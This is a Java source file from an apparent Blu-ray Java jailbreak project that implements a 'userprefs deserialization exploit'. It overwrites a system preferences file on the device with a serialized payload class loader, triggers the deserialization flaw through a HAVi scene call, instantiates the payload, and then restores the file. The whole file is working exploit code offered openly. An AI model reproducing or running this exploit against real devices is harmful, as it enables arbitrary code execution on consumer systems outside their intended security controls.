/*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license.  See the LICENSE file for details.
 */

package com.bdjb;

import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.io.FileOutputStream;
import org.havi.ui.HSceneFactory;

/** Implementation of the userprefs deserialization exploit. */
class ExploitUserPrefsImpl implements ExploitInterface {
  private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";

  private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";

  public void trigger() throws Exception {
    try {
      // Overwrite userprefs with a serialized PayloadClassLoader.
      InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER);
      OutputStream outputStream = new FileOutputStream(MNT_ADA_USERPREFS);

      byte[] buf = new byte[8192];
      int read;
      while ((read = inputStream.read(buf)) > 0) {
        outputStream.write(buf, 0, read);
      }

      outputStream.close();
      inputStream.close();

      // Trigger deserialization vulnerability.
      try {
        HSceneFactory.getInstance().getDefaultHScene();
      } catch (ClassCastException e) {
        // Exception expected.

        // Instantiate the payload class.
        PayloadClassLoader.getInstance().newPayload();
      }
    } finally {
      // Restore userprefs file.
      String[][] preferences = new String[9][];
      preferences[3] = new String[] {"26"};
      ObjectOutputStream outputStream =
          new ObjectOutputStream(new FileOutputStream(MNT_ADA_USERPREFS));
      outputStream.writeObject(preferences);
      outputStream.close();
    }
  }
}